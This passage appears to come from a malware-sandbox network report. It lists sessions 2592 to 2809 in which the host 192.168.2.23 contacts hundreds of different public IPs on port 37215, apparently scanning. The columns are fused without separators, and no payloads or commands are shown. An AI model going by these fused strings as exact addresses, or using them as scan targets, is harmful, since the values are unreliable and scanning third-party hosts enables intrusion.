                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2592192.168.2.2355602199.112.114.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2593192.168.2.2352080157.54.209.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2594192.168.2.2356922157.124.73.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2595192.168.2.2345844197.62.210.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2596192.168.2.2340874197.154.80.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2597192.168.2.2332910157.181.110.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2598192.168.2.2335418157.221.107.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2599192.168.2.235944441.140.27.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2600192.168.2.235794641.149.63.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2601192.168.2.2360102197.253.109.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2602192.168.2.235736441.142.105.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2603192.168.2.2354910197.126.156.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2604192.168.2.235099093.249.73.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2605192.168.2.2351712197.91.79.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2606192.168.2.234451241.180.229.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2607192.168.2.233436641.178.105.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2608192.168.2.235607677.215.241.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2609192.168.2.2349706186.160.120.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2610192.168.2.2346242197.68.22.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2611192.168.2.2359776169.56.83.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2612192.168.2.2352652157.122.126.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2613192.168.2.2342550197.64.0.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2614192.168.2.233878241.180.248.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2615192.168.2.234221041.206.141.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2616192.168.2.235474063.236.159.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2617192.168.2.2354810197.75.249.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2618192.168.2.2349942117.54.16.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2619192.168.2.2358086157.170.20.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2620192.168.2.2359078157.26.95.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2621192.168.2.2347906197.186.212.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2622192.168.2.2355730197.69.139.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2623192.168.2.2332958157.30.192.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2624192.168.2.2344644197.164.113.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2625192.168.2.234401042.213.103.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2626192.168.2.235906641.35.205.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2627192.168.2.2354490157.18.72.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2628192.168.2.2351164157.146.62.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2629192.168.2.234016641.1.183.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2630192.168.2.2356446157.162.240.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2631192.168.2.2333026157.156.231.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2632192.168.2.2339010197.130.133.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2633192.168.2.233974041.128.170.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2634192.168.2.233960241.21.99.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2635192.168.2.234088041.234.177.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2636192.168.2.2359766115.149.62.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2637192.168.2.2332872157.53.114.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2638192.168.2.2338504157.235.39.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2639192.168.2.234400078.205.209.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2640192.168.2.2335564139.70.6.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2641192.168.2.2343214188.142.57.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2642192.168.2.2359024197.218.107.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2643192.168.2.2348584197.233.159.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2644192.168.2.2342414197.17.249.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2645192.168.2.235820494.85.196.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2646192.168.2.2347014157.111.32.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2647192.168.2.2336206157.252.71.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2648192.168.2.2355574157.85.158.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2649192.168.2.235328841.237.154.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2650192.168.2.2334822157.155.84.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2651192.168.2.234731241.85.73.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2652192.168.2.2358156157.82.176.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2653192.168.2.233380241.152.199.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2654192.168.2.2353716197.130.36.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2655192.168.2.2358020193.126.61.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2656192.168.2.2344486157.60.13.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2657192.168.2.2339584197.214.210.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2658192.168.2.233710241.110.204.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2659192.168.2.2354938157.233.230.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2660192.168.2.233914041.172.239.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2661192.168.2.2342618197.92.34.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2662192.168.2.2358400157.11.181.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2663192.168.2.2353322181.132.155.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2664192.168.2.2352798157.104.111.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2665192.168.2.2352208157.74.23.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2666192.168.2.2352880157.50.112.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2667192.168.2.2338740157.5.115.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2668192.168.2.234539441.37.48.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2669192.168.2.2346640157.10.31.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2670192.168.2.235265441.238.78.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2671192.168.2.2335634197.136.161.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2672192.168.2.2359372197.68.141.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2673192.168.2.2346942197.201.174.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2674192.168.2.2342828157.182.46.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2675192.168.2.2341534157.179.144.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2676192.168.2.2349808157.144.64.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2677192.168.2.233387414.230.210.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2678192.168.2.2343984157.175.34.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2679192.168.2.233823641.248.219.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2680192.168.2.2347010157.71.113.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2681192.168.2.2349852197.14.67.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2682192.168.2.2360824197.30.77.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2683192.168.2.2355794157.224.194.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2684192.168.2.2352730157.26.1.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2685192.168.2.2360810157.234.41.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2686192.168.2.234314889.104.217.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2687192.168.2.233510241.133.243.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2688192.168.2.2333864197.152.30.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2689192.168.2.2351268197.41.91.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2690192.168.2.235011090.135.145.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2691192.168.2.2338630157.241.5.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2692192.168.2.2358558157.51.250.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2693192.168.2.234103268.172.171.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2694192.168.2.234276441.77.254.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2695192.168.2.2352252157.11.121.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2696192.168.2.2333548197.140.111.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2697192.168.2.235192698.169.80.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2698192.168.2.2352836113.220.172.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2699192.168.2.2351968144.189.179.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2700192.168.2.2343714197.206.213.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2701192.168.2.235737041.68.229.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2702192.168.2.234436641.119.74.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2703192.168.2.2344150197.70.192.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2704192.168.2.2356998197.108.90.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2705192.168.2.235780441.252.1.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2706192.168.2.2333394197.240.29.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2707192.168.2.235958283.5.220.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2708192.168.2.2349658157.31.238.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2709192.168.2.2356298197.47.6.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2710192.168.2.2332950197.91.70.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2711192.168.2.2347314197.147.249.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2712192.168.2.235885841.31.162.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2713192.168.2.2334716197.30.9.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2714192.168.2.2358128157.177.127.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2715192.168.2.235222668.217.172.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2716192.168.2.235507641.100.184.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2717192.168.2.2334690186.93.228.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2718192.168.2.2353116197.138.134.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2719192.168.2.235370641.156.95.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2720192.168.2.2337042173.74.56.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2721192.168.2.2355302157.205.123.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2722192.168.2.2342486197.157.224.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2723192.168.2.2357884197.122.191.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2724192.168.2.2343574141.82.14.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2725192.168.2.2359218157.135.112.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2726192.168.2.234156866.69.23.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2727192.168.2.2335008105.200.93.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2728192.168.2.2347328197.191.65.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2729192.168.2.233891241.204.51.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2730192.168.2.2356746157.139.63.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2731192.168.2.2334706197.176.187.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2732192.168.2.234639860.106.32.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2733192.168.2.2355540197.229.7.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2734192.168.2.2352692157.55.197.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2735192.168.2.2334184157.143.18.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2736192.168.2.2334902206.167.215.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2737192.168.2.2343384197.199.83.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2738192.168.2.2333490197.145.239.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2739192.168.2.2360856164.35.186.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2740192.168.2.2346316197.170.55.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2741192.168.2.234260065.240.145.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2742192.168.2.235962841.76.37.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2743192.168.2.2338350197.251.204.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2744192.168.2.2357690157.71.76.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2745192.168.2.2338414157.32.66.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2746192.168.2.235834062.20.209.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2747192.168.2.2356632157.137.43.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2748192.168.2.233449641.166.81.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2749192.168.2.2360606197.46.6.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2750192.168.2.2346478195.180.40.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2751192.168.2.2337598197.13.215.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2752192.168.2.2358556197.89.15.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2753192.168.2.234342841.175.168.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2754192.168.2.2353998157.61.154.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2755192.168.2.2350026197.195.199.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2756192.168.2.2341698197.143.236.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2757192.168.2.2337528197.60.59.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2758192.168.2.2357168157.95.35.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2759192.168.2.233309444.76.136.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2760192.168.2.2351836157.163.38.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2761192.168.2.234987241.160.127.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2762192.168.2.2359448197.6.3.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2763192.168.2.2356042135.97.175.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2764192.168.2.2350318164.164.12.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2765192.168.2.2333308197.3.220.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2766192.168.2.233366441.71.96.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2767192.168.2.233355641.193.29.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2768192.168.2.2335476168.130.93.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2769192.168.2.2354076157.246.130.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2770192.168.2.2344356197.223.227.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2771192.168.2.2338702157.216.91.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2772192.168.2.2334204113.138.172.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2773192.168.2.2351874157.120.16.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2774192.168.2.2357600192.223.21.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2775192.168.2.2333970197.28.211.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2776192.168.2.2345234197.88.133.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2777192.168.2.2358226170.7.182.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2778192.168.2.234909241.202.210.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2779192.168.2.234810641.188.74.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2780192.168.2.234715641.144.83.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2781192.168.2.2353848175.182.124.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2782192.168.2.2343978197.188.102.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2783192.168.2.2338058157.15.56.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2784192.168.2.2337328154.160.66.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2785192.168.2.2351364157.42.197.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2786192.168.2.2359730157.102.172.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2787192.168.2.233343441.9.72.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2788192.168.2.2357896197.205.104.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2789192.168.2.2341808192.128.133.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2790192.168.2.233633441.114.171.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2791192.168.2.233746041.191.51.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2792192.168.2.233843041.238.246.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2793192.168.2.234033641.87.67.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2794192.168.2.2351720157.141.141.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2795192.168.2.2347504157.16.182.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2796192.168.2.2350934132.111.133.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2797192.168.2.2338892157.236.47.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2798192.168.2.235640041.92.242.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2799192.168.2.235102641.248.201.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2800192.168.2.2359390197.147.36.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2801192.168.2.2345494157.190.95.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2802192.168.2.233833041.7.61.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2803192.168.2.23531525.183.38.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2804192.168.2.233714241.154.147.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2805192.168.2.2359796167.151.54.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2806192.168.2.2344104200.45.24.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2807192.168.2.2357394197.67.100.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2808192.168.2.2333534197.176.145.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2809192.168.2.2347998197.69.20.5737215
                                          TimestampBytes transferredDirectionData


